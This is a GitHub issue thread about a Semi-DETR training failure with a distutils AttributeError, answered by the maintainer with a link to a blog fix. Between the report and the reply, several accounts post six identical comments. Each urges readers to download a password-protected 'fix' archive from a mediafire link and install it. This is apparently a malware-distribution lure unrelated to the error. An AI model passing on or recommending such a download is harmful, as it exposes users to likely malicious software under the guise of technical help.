### ISSUE TITLE
你您好，我已经使用了您的环境，确实解决了一些问题，但还是不能运行，训练文件由于sh的兼容问题自行修改了一下

### ISSUE THREAD

**Issue by Yuanyan266969** [JCZ404/Semi-DETR#24]
2024-08-27 08:36:25,563 - mmdet.detr_ssod - INFO - Checkpoints will be saved to /home/featurize/work/Semi-DETR-main/work_dirs/detr_ssod_dino_detr_r50_coco_120k/10/1 by HardDiskBackend.
Traceback (most recent call last):
  File "tools/train_detr_ssod.py", line 201, in <module>
    main()
  File "tools/train_detr_ssod.py", line 189, in main
    train_detector(
  File "/home/featurize/work/Semi-DETR-main/detr_ssod/apis/train.py", line 224, in train_detector
    runner.run(data_loaders, cfg.workflow)
  File "/home/featurize/work/SEMIdetr/lib/python3.8/site-packages/mmcv/runner/iter_based_runner.py", line 115, in run
    self.call_hook('before_run')
  File "/home/featurize/work/SEMIdetr/lib/python3.8/site-packages/mmcv/runner/base_runner.py", line 307, in call_hook
    getattr(hook, fn_name)(self)
  File "/home/featurize/work/SEMIdetr/lib/python3.8/site-packages/mmcv/runner/dist_utils.py", line 94, in wrapper
    return func(*args, **kwargs)
  File "/home/featurize/work/SEMIdetr/lib/python3.8/site-packages/mmcv/runner/hooks/logger/tensorboard.py", line 35, in before_run
    from torch.utils.tensorboard import SummaryWriter
  File "/home/featurize/work/SEMIdetr/lib/python3.8/site-packages/torch/utils/tensorboard/__init__.py", line 4, in <module>
    LooseVersion = distutils.version.LooseVersion
AttributeError: module 'distutils' has no attribute 'version'
ERROR:torch.distributed.elastic.multiprocessing.api:failed (exitcode: 1) local_rank: 0 (pid: 4559) of binary: /home/featurize/work/SEMIdetr/bin/python
ERROR:torch.distributed.elastic.agent.server.local_elastic_agent:[default] Worker group failed
INFO:torch.distributed.elastic.agent.server.api:[default] Worker group FAILED. 3/3 attempts left; will restart worker group
INFO:torch.distributed.elastic.agent.server.api:[default] Stopping worker group
INFO:torch.distributed.elastic.agent.server.api:[default] Rendezvous'ing worker group
INFO:torch.distributed.elastic.agent.server.api:[default] Rendezvous complete for workers. Result:
  restart_count=1
  master_addr=127.0.0.1
  master_port=29621
  group_rank=0
  group_world_size=1
  local_ranks=[0]
  role_ranks=[0]
  global_ranks=[0]
  role_world_sizes=[1]
  global_world_sizes=[1]

INFO:torch.distributed.elastic.agent.server.api:[default] Starting worker group
INFO:torch.distributed.elastic.multiprocessing:Setting worker0 reply file to: /tmp/torchelastic_c59s0d7p/none_97oqa99o/attempt_1/0/error.json
^CTraceback (most recent call last):
  File "tools/train_detr_ssod.py", line 201, in <module>
Traceback (most recent call last):
  File "/home/featurize/work/SEMIdetr/lib/python3.8/runpy.py", line 194, in _run_module_as_main
    return _run_code(code, main_globals, None,
  File "/home/featurize/work/SEMIdetr/lib/python3.8/runpy.py", line 87, in _run_code
    exec(code, run_globals)
  File "/home/featurize/work/SEMIdetr/lib/python3.8/site-packages/torch/distributed/launch.py", line 173, in <module>
    main()
  File "/home/featurize/work/SEMIdetr/lib/python3.8/site-packages/torch/distributed/launch.py", line 169, in main
    run(args)
  File "/home/featurize/work/SEMIdetr/lib/python3.8/site-packages/torch/distributed/run.py", line 621, in run
    elastic_launch(
  File "/home/featurize/work/SEMIdetr/lib/python3.8/site-packages/torch/distributed/launcher/api.py", line 116, in __call__
    return launch_agent(self._config, self._entrypoint, list(args))
  File "/home/featurize/work/SEMIdetr/lib/python3.8/site-packages/torch/distributed/elastic/multiprocessing/errors/__init__.py", line 348, in wrapper
    return f(*args, **kwargs)
  File "/home/featurize/work/SEMIdetr/lib/python3.8/site-packages/torch/distributed/launcher/api.py", line 238, in launch_agent
    result = agent.run()
  File "/home/featurize/work/SEMIdetr/lib/python3.8/site-packages/torch/distributed/elastic/metrics/api.py", line 125, in wrapper
    result = f(*args, **kwargs)
  File "/home/featurize/work/SEMIdetr/lib/python3.8/site-packages/torch/distributed/elastic/agent/server/api.py", line 700, in run
    result = self._invoke_run(role)
  File "/home/featurize/work/SEMIdetr/lib/python3.8/site-packages/torch/distributed/elastic/agent/server/api.py", line 828, in _invoke_run
    time.sleep(monitor_interval)

**Comment by NikhilKumar77777** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by NikhilKumar77777** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by NikhilKumar77777** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by NikhilKumar77777** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by JCZ404** [comment]
Hi, Thanks for your interest. For your problem, you can refer https://blog.csdn.net/weixin_46133643/article/details/125344874 for the possible solution.
